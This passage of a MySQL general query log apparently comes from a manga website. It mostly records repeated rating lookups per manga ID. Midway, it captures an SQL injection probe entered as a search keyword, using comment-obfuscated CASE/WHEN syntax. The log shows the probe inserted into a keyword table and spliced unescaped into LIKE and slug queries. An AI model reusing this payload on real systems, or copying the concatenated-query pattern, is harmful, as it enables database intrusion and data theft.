(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330651491 Quit 330651492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330651492 Quit 330651493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330651493 Quit 330651494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330651494 Quit 330651495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330651495 Quit 330651496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330651496 Quit 330651497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330651497 Quit 330651498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330651498 Quit 330651499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330651499 Quit 330651500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330651500 Quit 330651501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330651501 Quit 330651502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330651502 Quit 330651503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330651503 Quit 330651504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330651504 Quit 330651505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330651505 Quit 330651506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330651506 Quit 330651507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330651507 Quit 330651508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330651508 Quit 330651509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330651509 Quit 330651510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330651510 Quit 330651511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330651511 Quit 330651512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330651512 Quit 330651513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330651513 Quit 330651514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330651514 Quit 330651515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330651515 Quit 330651516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330651516 Quit 330651517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330651517 Quit 330651518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330651518 Quit 330651519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330651519 Quit 330651520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330651520 Quit 330651521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330651521 Quit 330651522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330651522 Quit 330651523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330651523 Quit 330651524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330651524 Quit 330651525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330651525 Quit 330651526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330651526 Quit 330651527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330651527 Quit 330651528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330651528 Quit 330651529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330651529 Quit 330651530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330651530 Quit 330651531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330651531 Quit 330651532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330651532 Quit 330651533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330651533 Quit 330651534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330651534 Quit 330651535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330651535 Quit 330651536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330651536 Quit 330651537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330651537 Quit 330651538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330651538 Quit 330651539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330651539 Quit 330651540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330651540 Quit 330651541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330651541 Quit 330651542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330651542 Quit 330651543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330651543 Quit 330651544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330651544 Quit 330651545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330651545 Quit 330651546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330651546 Quit 330651547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651547 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330651547 Quit 330651548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330651548 Quit 330651549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330651549 Quit 330651550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330651550 Quit 330651551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330651551 Quit 330651552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330651552 Quit 330651553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330651553 Quit 330651554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330651554 Quit 330651555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330651555 Quit 330651556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330651556 Quit 330651557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330651557 Quit 330651558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330651558 Quit 330651559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330651559 Quit 330651560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330651560 Quit 330651561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330651561 Quit 330651562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330651562 Quit 330651563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330651563 Quit 330651564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330651564 Quit 330651565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330651565 Quit 330651566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330651566 Quit 330651567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330651567 Quit 330651568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330651568 Quit 330651569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330651569 Quit 330651570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651570 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330651570 Quit 330651571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651571 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330651571 Quit 330651572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651572 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330651572 Quit 330651573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651573 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330651573 Quit 330651574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651574 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330651574 Quit 330651575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651575 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330651575 Quit 330651576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651576 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330651576 Quit 330651577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651577 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330651577 Quit 330651578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651578 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330651578 Quit 330651579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651579 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330651579 Quit 330651580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651580 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330651580 Quit 330651581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651581 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330651581 Quit 330651582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651582 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330651582 Quit 330651583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651583 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330651583 Quit 330651584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651584 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330651584 Quit 330651585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651585 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330651585 Quit 330651586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651586 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330651586 Quit 330651587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651587 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330651587 Quit 330651588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651588 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330651588 Quit 330651589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651589 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330651589 Quit 330651590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651590 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330651590 Quit 330651591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651591 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330651591 Quit 330651592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651592 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330651592 Quit 330651593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651593 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330651593 Quit 330651594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651594 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330651594 Quit 330651595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651595 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330651595 Quit 330651596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651596 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330651596 Quit 330651597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651598 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330651598 Quit 330651597 Quit 330651599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651599 Quit 330651600 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('1ANd//8606(2727(selECt//CasE//8606//wHEN//8606//TheN//1//elSE//0//END//FROm//RdBDAtabase)2727)-- -', '169.150.196.30', '2026-02-26 03:29:12') 330651600 Quit 330651601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651601 Query SELECT m.*, c.name AS latest_chapter, c.id AS latest_chapter_id FROM mangas m JOIN ( SELECT manga_id, MAX(id) AS latest_chapter_id FROM chapters GROUP BY manga_id ) lc ON lc.manga_id = m.id JOIN chapters c ON c.id = lc.latest_chapter_id WHERE ( m.title LIKE '%1ANd//8606(2727(selECt//CasE//8606//wHEN//8606//TheN//1//elSE//0//END//FROm//RdBDAtabase)2727)-- -%' OR ( m.alternate_title IS NOT NULL AND m.alternate_title <> '' AND m.alternate_title LIKE '%1ANd//8606(2727(selECt//CasE//8606//wHEN//8606//TheN//1//elSE//0//END//FROm//RdBDAtabase)2727)-- -%' ) ) 330651601 Quit 330651602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651602 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = '1\'ANd/**/8606=(%27~%27||(selECt/**/CasE/**/8606/**/wHEN/**/8606/**/TheN/**/1/**/elSE/**/0/**/END/**/FROm/**/RdB$DAtabase)||%27~%27)-- -' 330651602 Quit 330651603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651603 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330651603 Quit 330651604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651604 Quit 330651605 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330651605 Quit 330651606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651606 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '197' order by created desc 330651606 Quit 330651607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651607 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '33' order by created desc 330651607 Quit 330651608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651608 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '89' order by created desc 330651608 Quit 330651609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651609 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330651609 Quit 330651610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651610 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '4' order by created desc 330651610 Quit 330651611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651611 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '52' order by created desc 330651611 Quit 330651612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651612 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '127' order by created desc 330651612 Quit 330651613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651613 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '206' order by created desc 330651613 Quit 330651614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651614 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '30' order by created desc 330651614 Quit 330651615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651615 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '76' order by created desc 330651615 Quit 330651616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651616 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '115' order by created desc 330651616 Quit 330651617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651617 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '71' order by created desc 330651617 Quit 330651618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651618 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330651618 Quit 330651619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651619 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '19' order by created desc 330651619 Quit 330651620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651620 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '179' order by created desc 330651620 Quit 330651621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651621 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '21' order by created desc 330651621 Quit 330651622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651622 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '93' order by created desc 330651622 Quit 330651623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651623 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '172' order by created desc 330651623 Quit 330651624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651624 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '29' order by created desc 330651624 Quit 330651625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651625 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '51' order by created desc 330651625 Quit 330651626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651626 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '13' order by created desc 330651626 Quit 330651627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651627 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330651627 Quit 330651628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651628 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330651628 Quit 330651629 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651629 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330651629 Quit 330651630 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651630 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '218' order by created desc 330651630 Quit 330651631 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651631 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '57' order by created desc 330651631 Quit 330651632 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651632 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330651632 Quit 330651633 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651633 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '64' order by created desc 330651633 Quit 330651634 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651634 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '268' order by created desc 330651634 Quit 330651635 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651635 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '36' order by created desc 330651635 Quit 330651636 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651636 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330651636 Quit 330651637 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '205' order by created desc 330651637 Quit 330651638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '63' order by created desc 330651638 Quit 330651639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330651639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '233' order by created desc 330651639 Quit 